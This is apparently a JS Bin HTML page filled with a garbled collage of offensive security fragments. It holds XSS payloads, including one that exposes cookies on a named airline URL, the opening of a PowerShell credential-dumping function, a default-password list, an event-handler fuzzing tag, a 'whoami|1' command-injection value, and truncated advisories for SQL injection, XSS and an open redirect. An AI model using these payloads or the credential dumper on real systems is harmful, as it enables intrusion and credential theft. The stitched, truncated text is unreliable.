<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<title>JS Bin</title>
</head>
<body>
<object/onerror=write`1`//

function Invoke-Mimidogz
{
[CmdletBinding(DefaultParameterSetName="DumpCred")]
Param(
[Parameter(Position = 0)]
[String[]]
$ComputerName,

admin
test
secret
guest
1234
123456
demo123
demo
password123
password1

<a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)" onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)" onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)" ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)" o

Name : PIHOME RaspberryPi - Home Automation
Vendor Homepage : http://pihome.harkemedia.de/
Vulnerability Type : SQL Injection
Researcher : Evren Yalçın <evren [at] superbug [dot] co>
Details :
1- SQL Injection :
Source Code:

Name : United Airlines XSS Vulnerability
Vendor Homepage : http://www.united.com
Vulnerability Type : Cross-Site Scripting
Researcher : Evren Yalçın <evren [at] superbug [dot] co>
Example PoC is as follows :
http://www.united.com/travel/checkin/start.aspx?SID=&sessionKey=0DA191E8-342A-4FBE-A511-21C8702546D4&gLanguage=0&pat=False&code=PNR_NOT_FOUND_BY_ETICKET_LAST_NAME"><svg/onload=confirm(document.cookie)>//&opt=ET&1=&2=&3=123123123&4=
----

Name : Active Content Blocking Bypass via Data URIs in Vivaldi Browser
Software : Vivaldi Browser 1.0.83.38 (Developer Build) stable
Vendor Homepage : http://www.vivaldi.net
Vulnerability Type : Cross-Site Scripting
Researcher : Evren Yalçın <evren [at] superbug [dot] co>
Description
Vivaldi is a freeware web browser developed by Vivaldi Technologies, a company founded by former co-founder and CEO of Opera, Jon Stephenson von Tetzchner. The project's slogan is "A new browser for our friends", and the browser is aimed at hardcore technologists, heavy internet users, and previous Opera browser users disgruntled by Opera's transition from the Presto engine to Blink, which removed many popular features.
Details

About the Vulnerability
=======================
https://www.owasp.org/index.php/Unvalidated_Redirects_and_Forwards_Cheat_Sheet
Proof of concept
================
https://sso.tpo.com/members/edit?success_url=//google.com
Timeline

whoami|1

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import socket
import random
import time
dosya = open("liste.txt","r")
ipAddress=[]
for i in dosya:
    ipAddr = i
hexAllFfff = "18446744073709551615"